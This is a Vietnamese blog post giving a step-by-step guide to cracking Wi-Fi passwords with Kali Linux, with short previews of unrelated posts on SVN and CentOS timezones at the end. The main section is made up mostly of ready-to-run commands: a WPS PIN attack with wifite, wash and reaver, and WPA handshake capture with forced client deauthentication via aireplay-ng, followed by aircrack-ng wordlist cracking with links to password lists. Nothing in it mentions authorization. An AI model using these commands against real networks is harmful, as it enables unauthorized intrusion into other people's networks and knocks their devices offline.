Chuyển đến nội dung chính

Hack password wifi using Kali Linux - Hack pass wifi su dung Kali Linux


1. Khai thac loi bao mat WPS.

Su dung tool wifite. Cach su dung rat don gian.
- Start wifite len, bang cach go wifite tu command line
- Doi 1 luc, no se hien ra danh sach mang wifi kem theo kieu ma hoa, co enable WPS hay khong.
- Nhan Ctrl + C de stop. Thuc hien buoc tiep.
- Nhap so tuong ung voi mang wifi ma ban muon. Neu nhap nhieu hon 1, cac ban phan cach bang dau , hoac neu chon tat cac ban nhap vao "all"
- Buoc tiep theo la cho doi xem ket qua co kha quan hay khong


(Hoac dung lenh. Sau khi start airmon-ng start wlan0)

Hien thi danh sach cac mang enable WPS

wash -i mon0

Tiep den dung reaver

reaver -i mon0 -b [MAC] -c [channel id] -vv




2. Bruteforce su dung Word list

B1. Start mornitor.
Tu cua so command line, go airmon-ng start wlan0

B2. Hien thi danh sach cac mang wifi
airodump-ng mon0

B3. Luu lai thong tin handshake
airodump-ng --bssid [MAC cua access point] --channel [kenh] -w [duong dan] mon0

B4. Sau khi da capture duoc 4 buoc xac thuc handshake, thuc hien crack
aireplay-ng -a [MAC accesspoint] -c [MAC cua client] -0 20 mon0

hoac

aireplay-ng -a [MAC accesspoint] -c [MAC cua client] -0 0 mon0

B5. Crack password.
Mac dinh cac file o buoc 3 se luu o thu muc hien tai ma ban go lenh.

aircrack-ng -w [file pass] tenfile.cap

B6. Cho doi ket qua

Link danh sach wordlist:
- https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm
- https://wiki.skullsecurity.org/Passwords   (rockyou.txt)

Tham khao:
http://www.wirelessdomination.com/how-to-crack-wpa2-and-wpa-wifi-password-step-by-step-guide/

http://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-with-cowpatty-0148423/

Thu kieu nay xem tn:

http://www.kunbum.net/2014/04/huong-dan-crack-wpa-wpa2-bang-gpu-tren.html

Nhận xét

Bài đăng phổ biến từ blog này

Tạo SVN Server & import project lên svn

Hướng dẫn tạo svn repository, cấu hình apache & đẩy dự án lên SVN Đối với một vài dự án nhỏ bạn không được cấp svn, bạn không thể sử dụng những dịch vụ svn cung cấp miễn phí: Google code, bitbucket,... lúc đó điều đầu tiên nảy sinh trong đầu các bạn là cài đặt svn server trên máy mình để tiện sử dụng. Điều kiện, máy bạn cần cài đặt apache & svn - Trên Windows: các bạn có thể cài Xampp, wampserver hoặc apache riêng & TortoiseSVN - Trên Mac OSX: apache & svn đã có mặc định Ở đây mình hướng dẫn sử dụng trên hệ điều hành MacOSX ( do mình sử dụng máy Mac) Bước 1 . Tạo thư mục SVN. Để có thể add nhiều project vào svn, các bạn nên tạo một thư mục cha ví dụ: svn. Ở đây mình tạo thư mục svn với đường dẫn /Data/svn Bước 2 . Tạo file /Data/svn/.svn-policy-file [groups] team1 = longhoanggiang, giangnh [/] * = [symfony2jobeet:/] @team1 = rw ngongocquynh = r * =   Dấu * ở đây có nghĩa là tất cả anonymous user (ẩn danh) sẽ chỉ có quyền đọc (read). User longh

Change Timezone in CentOS | Thay đổi múi giờ trong CentOS

Timezone of VietNam is Asia/Ho_Chi_Minh. To change default timezone in centos, follow this struction.   mv /etc/localtime /etc/localtime.bak ln -s /usr/share/zoneinfo/Asia/Ho_Chi_Minh /etc/localtime Type date in terminal and you will see time in Viet Nam In Linux, the system time zone is determined by the symbolic link /etc/localtime . This link points to a time zone data file that describes the local time zone. The time zone data files are located at either /usr/lib/zoneinfo or /usr/share/zoneinfo depending on what distribution of Linux you use. For example, on a SuSE system located in New Jersey the /etc/localtime link would point to /usr/share/zoneinfo/US/Eastern . On a Debian system the /etc/localtime link would point to /usr/lib/zoneinfo/US/Eastern . If you fail to find the zoneinfo directory in either the /usr/lib or /usr/share directories, either do a find /usr -print | grep zoneinfo or consult your distribution's do